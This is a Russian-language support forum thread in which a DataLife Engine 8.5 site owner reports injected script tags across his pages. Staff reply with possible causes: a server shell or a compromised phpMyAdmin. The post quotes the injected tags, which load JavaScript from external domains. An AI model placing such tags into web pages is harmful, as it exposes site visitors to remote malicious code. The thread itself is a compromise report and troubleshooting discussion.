Перейти к публикации

Уязвимость новая


Рекомендованные сообщения

Сегодня увидел это на своей 8.5 во всех новостях, статистических страницах, банерах.

<script src="http://tvoyatajna.msk.ru/injs.system/" type="text/javascript"></script><script src="http://tvoyatajna.msk.ru/injs.c60fea8e758e68e6f7cc8429240913f9/" type="text/javascript"></script>

удалил всё.

Появилась новая

<script src="http://yourpic.msk.ru/in.a4c9a7bd0afe75472da08093f3da9bddfuckb3a0d2f20865ac5c1dbed9d8147d56ee/" type="text/javascript"></script>

Ничего левого не использую на сайте.

Вот тут тоже уже мучаются массово http://www.maultalk.com/topic66800s0.html трабла и у лиц(я) и у пиратов.

Ссылка на сообщение
Поделиться на других сайтах
Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вы вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован.
Ссылка на сообщение
Поделиться на других сайтах

Сегодня увидел это на своей 8.5 во всех новостях, статистических страницах, банерах.

Начните с выполнения правил форума или обращайтесь напрямую в службу поддержки http://dle-news.ru/index.php?do=feedback со своего клиентского аккаунта

Вот решение проблемы:

http://dle-news.ru/b...hih-dannyh.html

Необязательно. Например недавно была обнаружена серьезная уязвимость в MyPHPAdmin, а с учетом что код появился в новостях, это значит что он был добавлен не через скрипт DLE, т.к. добавление в JS в новости через DLE невозможна в принципе. Соответственно нужно смотреть что на сервере, это могут быть ранее не установленные патчи и соответственно шелл на сервере, а может быть взлом MyPHPAdmin и как следствие прямой доступ к БД, поэтому чтобы сказать о причинах, нужен визуальный осмотр сервера. И если человек пользуется легальным скриптом, то он может это сделать отправив запрос в службу поддержки.

На данный момент каких либо запросов ни от одного клиента по подобным проблемам не поступало. Странно как то, массово мучаются на каком то сайте, а в тех поддержку от клиентов ни одного обращения.

Ссылка на сообщение
Поделиться на других сайтах
Гость
Эта тема закрыта для публикации сообщений.
×
×
  • Создать...